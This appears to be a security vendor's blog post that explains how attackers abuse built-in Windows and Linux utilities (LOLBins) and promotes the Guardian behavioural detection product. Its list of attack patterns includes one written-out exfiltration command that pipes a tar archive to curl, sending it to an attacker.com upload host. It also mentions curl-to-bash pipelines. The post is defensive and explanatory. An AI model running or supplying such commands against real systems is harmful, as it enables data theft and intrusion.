LOLBins—short for Living Off the Land Binaries—refer to legitimate, preinstalled system utilities that attackers repurpose for malicious activity. These binaries are native to the operating system, digitally signed, and inherently trusted. Because they are not malware by design, they allow attackers to “live off the land,” blending seamlessly into normal system operations and evading traditional security controls.
Originally, LOLBins were primarily used during the post-exploitation phase to maintain persistence, escalate privileges, or move laterally across a network. Over time, however, threat actors have significantly expanded their use. Today, attackers rely on these built-in tools to bypass detection entirely and even to deliver malware—without dropping custom binaries to disk. This fileless malware approach dramatically reduces the attacker’s footprint and makes forensic investigation more difficult.
On Windows systems, many LOLBins are Microsoft-signed and deeply embedded into enterprise workflows. Examples include:
- certutil – downloads and decodes payloads
- WMIC – remote execution and system reconnaissance
- PowerShell – script execution, code injection, credential harvesting
- mshta, rundll32, regsvr32 – execute remote code, load DLLs, or run malicious scripts
Chained together, these tools can modify the registry, exfiltrate data, spawn hidden processes, and establish command-and-control channels—all while appearing legitimate to traditional defenses.
Linux systems are also heavily affected by LOLBins. Here is one recent example from just 2 months ago in which a malicious archive (RAR) is delivered via phishing email. The payload is encoded in the filename itself. This allows the attackers to trigger code execution — via shell commands that evaluate filenames — when the archive is processed.
Widely Abused Linux LOLBins Include:
- bash / sh – execute payloads directly in memory, run encoded commands, pivot laterally
- curl / wget – download malicious scripts or payloads from remote endpoints
- ssh / scp – enable lateral movement or data exfiltration using existing authentication
- awk / sed / perl / python – execute inline scripts, decode payloads, or run obfuscated code
- systemctl – manipulate services, create persistence, or escalate privileges
- cron / at – establish scheduled persistence mechanisms
- tar / gzip / base64 – pack, unpack, or encode data for exfiltration or execution chains
- mount / fusermount – mount remote or rogue filesystems for delivering tools or exfiltrating data
- sudo – exploited when misconfigured to elevate privileges without leaving obvious traces
Example Attack Patterns Seen in the Wild
- curl | bash pipelines to fetch and execute scripts directly in memory
- Using python -c or perl -e to execute full backdoors with no files written to disk
- SSH agent hijacking to impersonate legitimate users
- Creating persistent services via systemctl enable for long-term access
- Data exfiltration with tar czf - /dir | curl -T - https://attacker.com/upload
Linux LOLBins are especially dangerous in cloud and containerized environments where these tools are frequently installed by default—and where attackers can blend into high-volume automation activity.
What makes LOLBins particularly dangerous is that they rarely trigger traditional antivirus alerts. Since these tools are expected to run on production systems, security platforms that rely solely on signature-based detection often classify their activity as benign. This creates a blind spot that sophisticated attackers routinely exploit.
How Guardian Detects and Eliminates LOLBin Abuse
Codenotary Guardian, addresses this exact blind spot by shifting security from file-based detection to behavior-driven, AI-powered runtime protection.
Instead of asking, “Is this binary malicious?”, Guardian continuously asks, “Is this behavior legitimate right now?” Guardian establishes secure behavioral baselines for system binaries and monitors their execution in real time. When a trusted utility like certutil or PowerShell suddenly performs anomalous actions—such as reaching out to untrusted external endpoints, decoding hidden payloads, or spawning suspicious child processes—Guardian immediately detects the deviation.
Key capabilities used to neutralize LOLBin-based attacks include:
- AI-driven behavioral analysis to detect abnormal execution chains even when every component is technically signed and trusted.
- Real-time policy enforcement to block suspicious command execution before payload delivery completes.
- Continuous vulnerability correlation to identify when LOLBins are being used in combination with known exploit paths.
- CIS and compliance benchmarking to highlight dangerous misconfigurations that make LOLBin abuse easier.
Why LOLBins Demand a New Security Model
LOLBins represent a fundamental shift in attacker tradecraft. Instead of importing malware, adversaries weaponize what already exists inside your environment. This makes traditional perimeter-based and signature-based security insufficient on its own.
Guardian’s AI-first, runtime-driven approach directly addresses this evolution. By understanding how trusted binaries should behave—and stopping them when they don’t—Guardian eliminates one of today’s most dangerous stealth attack techniques. In an era of fileless malware and trusted tool abuse, security must focus on behavior, context, and intent—not just files.
